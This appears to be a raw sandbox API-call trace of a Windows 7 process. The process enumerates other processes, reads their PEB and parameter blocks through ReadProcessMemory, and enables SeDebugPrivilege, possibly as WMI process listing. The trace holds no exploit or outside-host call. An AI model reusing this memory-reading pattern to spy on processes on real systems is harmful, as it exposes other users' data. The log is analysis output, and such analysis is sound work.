[0564.710] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.710] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.725] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x640) returned 0x1e8
[0564.725] GetLastError () returned 0x0
[0564.725] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0564.725] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffdf018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.725] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0564.725] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x112820, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0564.725] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x1126a6, lpBuffer=0xced2a0, nSize=0x30, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0564.726] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0564.728] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0564.728] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffdf020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.728] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x111e90, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0564.728] malloc (_Size=0x32) returned 0x3ee140
[0564.728] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x1126d6, lpBuffer=0x3ee140, nSize=0x30, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3ee140*, lpNumberOfBytesRead=0x0) returned 1
[0564.729] free (_Block=0x3ee140)
[0564.730] CloseHandle (hObject=0x1e8) returned 1
[0564.730] _ui64tow (_Value=0x598, _Buffer="1600", _Radix=10) returned="1432"
[0564.733] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1432") returned 4
[0564.734] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.734] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.747] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x598) returned 0x1e8
[0564.747] GetLastError () returned 0x0
[0564.747] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0564.747] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffd7018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.747] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0564.748] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x352850, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0564.748] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x3526c8, lpBuffer=0xced2a0, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0564.748] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0564.749] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0564.749] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffd7020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.749] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x351ea0, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0564.749] malloc (_Size=0x80) returned 0x401d40
[0564.749] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x35270a, lpBuffer=0x401d40, nSize=0x7e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x401d40*, lpNumberOfBytesRead=0x0) returned 1
[0564.750] free (_Block=0x401d40)
[0564.750] CloseHandle (hObject=0x1e8) returned 1
[0564.751] _ui64tow (_Value=0x740, _Buffer="1432", _Radix=10) returned="1856"
[0564.753] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1856") returned 4
[0564.754] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.754] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.770] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x740) returned 0x1e8
[0564.770] GetLastError () returned 0x0
[0564.770] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0564.770] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffdf018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.770] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0564.771] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x4228e0, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0564.771] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x4226ca, lpBuffer=0xced2a0, nSize=0x38, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0564.771] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0564.772] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0564.772] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffdf020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.772] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x421ea0, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0564.773] malloc (_Size=0xe0) returned 0x401d40
[0564.773] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x422702, lpBuffer=0x401d40, nSize=0xde, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x401d40*, lpNumberOfBytesRead=0x0) returned 1
[0564.773] free (_Block=0x401d40)
[0564.774] CloseHandle (hObject=0x1e8) returned 1
[0564.775] _ui64tow (_Value=0x764, _Buffer="1856", _Radix=10) returned="1892"
[0564.778] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1892") returned 4
[0564.778] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.778] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.791] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x764) returned 0x1e8
[0564.791] GetLastError () returned 0x0
[0564.792] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0564.792] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffd8018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.792] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0564.792] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x222340, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0564.792] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x22215a, lpBuffer=0xced2a0, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0564.792] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0564.793] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0564.793] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffd8020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.793] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x221990, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0564.793] malloc (_Size=0xe6) returned 0x401d40
[0564.793] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x22219a, lpBuffer=0x401d40, nSize=0xe4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x401d40*, lpNumberOfBytesRead=0x0) returned 1
[0564.794] free (_Block=0x401d40)
[0564.794] CloseHandle (hObject=0x1e8) returned 1
[0564.795] _ui64tow (_Value=0x520, _Buffer="1892", _Radix=10) returned="1312"
[0564.797] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1312") returned 4
[0564.798] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.798] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.810] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x520) returned 0x1e8
[0564.810] GetLastError () returned 0x0
[0564.810] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0564.810] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffd5018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.810] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0564.810] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2728c0, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0564.810] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2726d4, lpBuffer=0xced2a0, nSize=0x44, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0564.811] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0564.812] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0564.812] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffd5020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.812] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x271ea0, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0564.813] malloc (_Size=0x74) returned 0x401d40
[0564.813] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x272718, lpBuffer=0x401d40, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x401d40*, lpNumberOfBytesRead=0x0) returned 1
[0564.813] free (_Block=0x401d40)
[0564.814] CloseHandle (hObject=0x1e8) returned 1
[0564.814] _ui64tow (_Value=0x4dc, _Buffer="1312", _Radix=10) returned="1244"
[0564.817] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1244") returned 4
[0564.818] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.818] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.840] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4dc) returned 0x1e8
[0564.840] GetLastError () returned 0x0
[0564.840] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0564.840] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffdf018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.840] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0564.840] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2027e0, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0564.841] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2026c8, lpBuffer=0xced2a0, nSize=0x3a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0564.841] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0564.842] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0564.842] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffdf020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.842] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x201ea0, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0564.843] malloc (_Size=0x10) returned 0x3eef40
[0564.843] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x202702, lpBuffer=0x3eef40, nSize=0xe, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3eef40*, lpNumberOfBytesRead=0x0) returned 1
[0564.843] free (_Block=0x3eef40)
[0564.843] CloseHandle (hObject=0x1e8) returned 1
[0564.844] _ui64tow (_Value=0x7e4, _Buffer="1244", _Radix=10) returned="2020"
[0564.847] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="2020") returned 4
[0564.848] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.848] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.861] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e4) returned 0x0
[0564.862] CloseHandle (hObject=0x0) returned 0
[0564.886] free (_Block=0x3f1c80)
[0564.886] malloc (_Size=0x48) returned 0x3ed130
[0564.886] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1e8
[0564.886] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7fef4a510f0, lpParameter=0x7fef4c23eb0, dwCreationFlags=0x0, lpThreadId=0x7fef4c23eb0 | out: lpThreadId=0x7fef4c23eb0*=0x1ec) returned 0x1f0
[0564.888] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcedab8 | out: lpSystemTimeAsFileTime=0xcedab8*(dwLowDateTime=0x6ae894b0, dwHighDateTime=0x1dab599))
[0564.888] malloc (_Size=0x40) returned 0x3ed1d0
[0564.888] malloc (_Size=0x10) returned 0x3eef40
[0564.888] SetEvent (hEvent=0x1e8) returned 1
[0564.891] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x4) returned 0x1fd9b0
[0564.891] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1fd9b0, pulNumLanguages=0xcee620 | out: pulNumLanguages=0xcee620) returned 1
[0564.891] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9b0 | out: hHeap=0x1c0000) returned 1
[0572.507] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0572.518] SetLastError (dwErrCode=0x0)
[0572.518] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xcee628, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcee530 | out: pulNumLanguages=0xcee628, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcee530) returned 1
[0572.518] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9d0
[0572.518] SetLastError (dwErrCode=0x0)
[0572.518] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xcee628, pwszLanguagesBuffer=0x1fd9d0, pcchLanguagesBuffer=0xcee530 | out: pulNumLanguages=0xcee628, pwszLanguagesBuffer=0x1fd9d0, pcchLanguagesBuffer=0xcee530) returned 1
[0572.518] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9b0
[0572.518] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9d0 | out: hHeap=0x1c0000) returned 1
[0572.518] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x14) returned 0x1fd650
[0572.518] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1fd650, pulNumLanguages=0xcee628 | out: pulNumLanguages=0xcee628) returned 1
[0572.519] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd650 | out: hHeap=0x1c0000) returned 1
[0572.521] SafeArrayGetElemsize (psa=0x22b420) returned 0x8
[0572.521] SafeArrayPutElement (psa=0x22b420, rgIndices=0xcede60, pv=0x227398) returned 0x0
[0572.521] SafeArrayRedim (in: psa=0x22b420, psaboundNew=0xcede78 | out: psa=0x22b420) returned 0x0
[0572.521] SafeArrayCopy (in: psa=0x22b420, ppsaOut=0xceddc0 | out: ppsaOut=0xceddc0) returned 0x0
[0572.523] SetEvent (hEvent=0x1e8) returned 1
[0572.524] free (_Block=0x3ed130)
[0572.524] GetCurrentThread () returned 0xfffffffffffffffe
[0572.524] OpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x28, OpenAsSelf=1, TokenHandle=0xcedc18 | out: TokenHandle=0xcedc18*=0x1f4) returned 1
[0572.524] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xcedbf4 | out: lpLuid=0xcedbf4*(LowPart=0x14, HighPart=0)) returned 1
[0572.525] SetLastError (dwErrCode=0x0)
[0572.525] AdjustTokenPrivileges (in: TokenHandle=0x1f4, DisableAllPrivileges=0, NewState=0xcedbf0*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0572.525] GetLastError () returned 0x514
[0572.525] CloseHandle (hObject=0x1f4) returned 1
[0572.525] malloc (_Size=0x18) returned 0x3eef00
[0572.525] SafeArrayPutElement (psa=0x22b460, rgIndices=0xcedc98, pv=0x22b4d8) returned 0x0
[0572.525] SafeArrayPutElement (psa=0x22b4a0, rgIndices=0xcedc98, pv=0x22b4d8) returned 0x0
[0572.526] free (_Block=0x3eef00)
[0572.526] malloc (_Size=0x8000) returned 0x402550
[0572.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x402550, Length=0x8000, ResultLength=0x0 | out: SystemInformation=0x402550, ResultLength=0x0) returned 0xc0000004
[0572.529] free (_Block=0x402550)
[0572.529] malloc (_Size=0x10000) returned 0x3f1c80
[0572.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3f1c80, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x3f1c80, ResultLength=0x0) returned 0x0
[0572.530] _ui64tow (_Value=0x0, _Buffer="", _Radix=10) returned="0"
[0572.533] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="0") returned 1
[0572.533] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x11001001, szCSDVersion="") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.533] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.540] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0
[0572.540] CloseHandle (hObject=0x0) returned 0
[0572.541] _ui64tow (_Value=0x4, _Buffer="0", _Radix=10) returned="4"
[0572.543] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="4") returned 1
[0572.544] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.544] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.556] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0
[0572.556] CloseHandle (hObject=0x0) returned 0
[0572.556] _ui64tow (_Value=0x110, _Buffer="4", _Radix=10) returned="272"
